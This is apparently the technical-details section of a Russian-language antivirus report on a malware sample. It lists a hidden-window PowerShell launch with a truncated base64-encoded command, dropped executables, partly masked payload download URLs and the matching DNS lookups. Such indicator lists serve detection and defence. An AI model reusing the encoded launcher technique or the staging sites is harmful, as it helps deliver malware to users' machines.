Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD IABzAEUAdAAgADAAdAB4ADQASQBXACAAIAAoAFsAdABZAFAARQBdACgAIgB7ADEAfQB7ADAAfQB7ADQAfQB7ADMAfQB7ADIAfQAiACAALQBmACAAJwBZAFMAdABFAE0ALgAnACwAJwBzACcALAAnAGMAVABPAFIAeQAnACwAJw...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1504
- %TEMP%\1181442.cvr
- %HOMEPATH%\yt0nro2\f4dj9aj\x1p_ja.exe
- %HOMEPATH%\yt0nro2\f4dj9aj\x1p_ja.exe
- http://www.jo####anarroyo.com/antithetical-bulblet/l/
- http://mo###-2free.com/cgi-bin/s/
- http://gk##5.com/breadbox/mlu/
- http://da###yse.net/Ccl/5W/
- http://pp##.top/wp-admin/o1/
- DNS ASK jo####anarroyo.com
- DNS ASK mo###-2free.com
- DNS ASK bu##zy.net
- DNS ASK su####iestate.com
- DNS ASK gk##5.com
- DNS ASK da###yse.net
- DNS ASK pp##.top
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD IABzAEUAdAAgADAAdAB4ADQASQBXACAAIAAoAFsAdABZAFAARQBdACgAIgB7ADEAfQB7ADAAfQB7ADQAfQB7ADMAfQB7ADIAfQAiACAALQBmACAAJwBZAFMAdABFAE0ALgAnACwAJwBzACcALAAnAGMAVABPAFIAeQAnACwAJw...' (со скрытым окном)